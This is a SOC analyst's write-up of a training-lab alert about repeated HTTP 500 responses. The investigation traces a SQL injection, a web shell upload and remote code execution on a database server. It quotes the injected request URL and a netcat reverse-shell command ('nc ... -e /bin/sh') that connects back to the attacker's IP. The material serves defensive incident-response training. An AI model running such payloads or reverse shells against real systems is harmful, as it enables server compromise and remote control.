HTTP response is how the web-server tells you what is going on. If you get a 200 status code, that means everything went well. 301? You’re being redirected.
But 500? It usually means there is an error by the back-end server. But multiple 500 responses? That’s something worth looking at.
In this case, we’ll take a look at a case where there was multiple 500 response made on a server.
Case Details
- Event Time: April 18, 2021, 1 p.m.
- EventID : 89
- Rule: SOC142 — Multiple HTTP 500 Response
- Level: Security Analyst
- Source Address 101.32.223.119
- Source Hostname 101.32.223.119
- Destination Address 172.16.20.6
- Destination Hostname SQLServer
- Username www-data
- Request URL https://172.16.20.6/userNumber=1 AND (SELECT * FROM Users) = 1
- User Agent Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
- Device Action Allowed
Analysis
- Source address is : 101.32.223.119
- Destination Address is : 172.16.20.6
- Looking at the destination address in Endpoint Management, the target was our SQL server.
- Let’s see if the IP was flagged as malicious on VirusTotal.
- The IP was flagged as malicious by 5 vendors. So anything flagged as malicious by some security vendors, we should take some precaution with it.
Logs
- We can search for the source address and the destination address in the Logs Management.
- We see a lot of entries and if we inspect one of them, it looks like they were trying for SQL injection at :
- At entry 392, it seems that they managed to upload a web shell.
- And for the last entry, it seems they have managed to achieve remote code execution.
Endpoint Management
- Let’s search for the destination address.
- It is indeed our SQL server. Let’s look at the command history.
- If we look for the entries at time
13:01
until13:05
, these looks fishy. - If you don’t know,
nc
is the command for netcat. Netcat is a networking utility to establish TCP or UDP connections.
nc 101.32.223.119 1234 -e /bin/sh
- So it’s connecting to the source address on port 1234 and
-e
/bin/sh
where sh is a shell.
-e filename specify filename to exec after connect (use with caution).
- Now let’s see if they were any network connections made to that IP.
- Looks like it indeed connected to the IP, so our SQL server was compromised.
- Let’s look now at process to see if they started any weird process other than the netcat connection.
- I’m not sure what its deleting, but I know for sure
clamav
is free and open source anti-virus program usually used in Linux. Deleting it is a bit suspicious.
Final Verdict
- From all the evidence we see and collected, we can confirm that an attacker leveraged a SQL injection vulnerability on the SQL server to compromise the server. The threat actor managed to use the vulnerability to upload a web shell where the actor was able to perform remote code execution on the server. This leads to the compromise of the server. This is a true positive.